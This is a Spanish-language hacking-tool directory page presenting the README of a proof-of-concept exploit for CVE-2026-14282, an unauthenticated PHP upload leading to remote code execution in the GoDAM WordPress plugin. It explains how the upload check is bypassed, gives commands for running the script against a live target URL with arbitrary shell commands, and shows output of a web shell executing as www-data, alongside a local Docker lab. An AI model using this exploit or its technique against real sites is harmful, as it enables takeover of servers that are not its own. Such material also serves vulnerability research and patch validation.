Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14282 — GoDAM plugin de WordPress <= 1.12.2 subida de archivos no autenticada RCE (CVE-2026-14282) | Kitploit
Herramientas/GitHubGitHub/nullwhisper/cve-2026-14282
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónLabs y Práctica
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM plugin de WordPress <= 1.12.2 subida de archivos no autenticada RCE (CVE-2026-14282)

Ver Repositorio
12hace 29 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-14282 — Plugin GoDAM para WordPress <= 1.12.2 Subida de archivos sin autenticar -> RCE

Autor: nullwhisper
Caso de uso: solo investigación de seguridad autorizada / validación de vulnerabilidades.

¿Qué es esto?

Las versiones <= 1.12.2 del plugin GoDAM para WordPress registran un campo de WPForms llamado godam_record. El gestor de subida save_video_file() está enganchado a la acción pública wpforms_process_before_filter, por lo que se ejecuta antes de cualquier comprobación de autenticación. El gestor confía en la cabecera Content-Type controlada por el atacante, acepta un archivo PHP siempre que el tipo MIME comience con video/, y lo mueve al directorio servido por web wp-content/uploads/godam/wpforms/. Esto permite a un atacante no autenticado subir y ejecutar código PHP arbitrario.

  • CVE: CVE-2026-14282
  • Producto: Plugin GoDAM para WordPress
  • Afectados: <= 1.12.2
  • Corregido: 2.0.0
  • Tipo: Subida arbitraria de archivos sin autenticar que conduce a RCE
  • CVSS: 9.8 (Crítico)
  • Referencias

    • Aviso de IONIX: https://www.ionix.io/threat-center/cve-2026-14282/
    • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-14282
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
    • Página del plugin en WordPress.org: https://wordpress.org/plugins/godam/

    Archivos

    root@kitploit:~
    .
    ├── cve_2026_14282_poc.py   # PoC principal
    ├── lab/
    │   ├── docker-compose.yml  # Laboratorio WordPress
    │   └── setup.php           # Crea un formulario de WPForms con el campo GoDAM
    ├── requirements.txt
    └── README.md
    

    Instalación

    root@kitploit:~
    pip3 install -r requirements.txt
    

    Uso

    Objetivo en vivo

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
    

    El script detecta automáticamente el ID del formulario de WPForms y el ID del campo GoDAM. Si la página contiene varios formularios o la detección falla, use:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
        --form-id 4 --field-id 1 --cmd "whoami"
    

    Laboratorio local

    1. Descargue los plugins vulnerables (no redistribuya los binarios):

      root@kitploit:~
      mkdir -p lab/wpforms-lite lab/godam
      cd lab/wpforms-lite
      wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
      unzip wpforms-lite.latest-stable.zip
      rm wpforms-lite.latest-stable.zip
      cd ../godam
      wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
      unzip godam.1.12.2.zip
      rm godam.1.12.2.zip
      cd ../..
      
    2. Inicie el laboratorio:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. Complete el instalador de WordPress en http://127.0.0.1:8092.

    4. Instale y active los plugins, luego cree el formulario y la página de prueba:

      root@kitploit:~
      docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
      docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. Ejecute el PoC:

      root@kitploit:~
      python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
      

    Verificado en localhost

    Probado en WordPress 6.8 + WPForms Lite última versión + GoDAM 1.12.2.

    root@kitploit:~
    [*] Detecting WPForms form and GoDAM field...
    [*] Found form ID 4, GoDAM field(s): 1
    [*] Trying upload via field 1...
    [+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
    [+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Command output:
    GODAM-RCE-Linux ... PWNED
    

    Por qué no se incluyen los binarios de los plugins

    Este repositorio contiene solo el PoC y los archivos de orquestación del laboratorio. Los binarios de los plugins vulnerables se excluyen para evitar aumentar el tamaño y problemas de distribución. Descargue las versiones vulnerables específicas desde WordPress.org para su propio laboratorio.

    Aviso legal

    Esta herramienta es solo para pruebas de seguridad autorizadas e investigación. No la use contra sistemas que no le pertenezcan o para los que no tenga permiso explícito de probar. El autor no es responsable del mal uso o de los daños causados por este código.

    Descargar herramienta